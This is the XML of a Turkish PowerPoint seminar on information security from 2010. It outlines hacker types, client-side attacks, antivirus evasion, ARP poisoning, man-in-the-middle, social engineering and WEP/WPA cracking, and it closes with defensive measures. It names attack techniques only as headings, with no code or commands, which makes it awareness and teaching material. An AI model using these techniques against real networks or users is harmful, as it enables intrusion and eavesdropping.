                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>/2010/06/07/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>wireless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>wpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>crack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>wireless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>wpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>crack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>.html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Bilişim Güvenliği</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>“Hacker” ve “Güvenlik Uzmanı” kavramları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Saldırı teknikleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Örnek saldırı uygulamaları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Sosyal mühendislik saldırısı (Senaryo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Tehtitlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>karşı alınabilecek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>önlemler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Tehtitlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> karşı alınabilecek önlemler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 şart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Halka açık ortamlarda güvenli internet kullanımı</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/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Ultrasurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>, TOR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Tünelleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> yazılımları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Lisanslı, güncel yazılımlar (korsana hayır)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Bilişim Güvenliği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Bilişim sistemlerinde işlenmekte olan verinin gizliliğini, bütünlülüğünü ve sürekliliğini korumayı amaçlayan bir alandır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Bilişim güvenliğinin temel amaçları;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Veri bütünlüğünün korunması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Erişim denetimi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Mahremiyet ve Gizliliğin korunması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Sistem devamlılığının sağlanması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Hacker Kimdir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İyi derece sistem, ağ ve programlama bilgisine sahip ters toplum mühendisidir.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Beyaz Şapkalılar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>	Bilişim teknoloji ve sistemlerini geliştirmek ve güvenliğini sağlamak temel amaçlarıdır.Güvenlik uzmanı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>olarakta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> adlandırılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Gri Şapkalılar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>	Hem savunma hem saldırı amaçlı tamamen kazanca yönelik çalışırlar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Siyah Şapkalılar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>	Zarar vermek, para kazanmak için bilgilerini kullanırlar.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Saldırı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Sistemlere Giriş Yöntemleri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İstemci tabanlı saldırılar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>ClickJacking</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Player</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>, PDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Reader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>, Office Zayıflıkları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> casus yazılımlar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Antivirusleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> atlatma teknikleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Exploitler</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> Etmek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Saldırı Teknikleri -Devam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Ağ tabanlı izleme,dinleme saldırıları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Aktif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Arp Zehirlemesi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 smtClean="0"/>
              <a:t>Ortadaki Adam Saldırısı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Pasif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Sosyal mühendislik saldırıları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Saldırı Teknikleri -Devam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Kablosuz Ağ Saldırıları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Gizli yayın yapan ağların tespit edilmesi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WEP/WPA2 anahtarlı kablosuz ağların kırılması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Saldırı Denemeleri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Microsoft DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Hijacking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4 Resim" descr="dllhijack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27052"/>
            <a:ext cx="6480720" cy="402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Saldırı Denemeleri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714544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Klavye girişlerini ve Ekran görüntüsünü ele geçirmek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7" name="6 Resim" descr="screensh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48792"/>
            <a:ext cx="5616624" cy="3864584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Resim" descr="keyscand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5760640" cy="64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1710</TotalTime>
  <Words>378</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Ekran Gösterisi (4:3)</PresentationFormat>
  <Paragraphs>134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Canlı</vt:lpstr>
      <vt:lpstr>Bilişim Güvenliği Semineri</vt:lpstr>
      <vt:lpstr>Sunum Planı</vt:lpstr>
      <vt:lpstr>Bilişim Güvenliği</vt:lpstr>
      <vt:lpstr>Hacker Kimdir</vt:lpstr>
      <vt:lpstr>Saldırı Teknikleri</vt:lpstr>
      <vt:lpstr>Saldırı Teknikleri -Devam</vt:lpstr>
      <vt:lpstr>Saldırı Teknikleri -Devam</vt:lpstr>
      <vt:lpstr>Örnek Saldırı Denemeleri 1</vt:lpstr>
      <vt:lpstr>Örnek Saldırı Denemeleri 1</vt:lpstr>
      <vt:lpstr>Örnek Saldırı Denemeleri 1</vt:lpstr>
      <vt:lpstr>Örnek Saldırı Denemeleri 2</vt:lpstr>
      <vt:lpstr>Sosyal Mühendislik Saldırıları</vt:lpstr>
      <vt:lpstr>Örnek Saldırı Denemeleri 3</vt:lpstr>
      <vt:lpstr>İnternet Trafiği Nasıl Dinleniyor </vt:lpstr>
      <vt:lpstr>İnternet Trafiği Nasıl Dinleniyor </vt:lpstr>
      <vt:lpstr>İnternet Trafiği Nasıl Dinleniyor </vt:lpstr>
      <vt:lpstr>Kablosuz Ağ Saldırıları</vt:lpstr>
      <vt:lpstr>Kablosuz Ağ Saldırıları</vt:lpstr>
      <vt:lpstr>WEP/WPA Crack</vt:lpstr>
      <vt:lpstr>Tehtitlere karşı alınabilecek önlemler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pentester</dc:creator>
  <cp:lastModifiedBy>mucahid</cp:lastModifiedBy>
  <cp:revision>205</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-10-30T13:11:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-11-02T02:05:13Z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1072A7A9-2EF3-4A4C-9619-A723E4B141E1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ArticulatePath">
    <vt:lpwstr>BilgiGüvenliğiSunumu</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ArticulateProjectFull">
    <vt:lpwstr>C:\Users\pentester\Desktop\maltepe-semineri\BilgiGüvenliğiSunumu.ppta</vt:lpwstr>
  </property>
</Properties>
</file>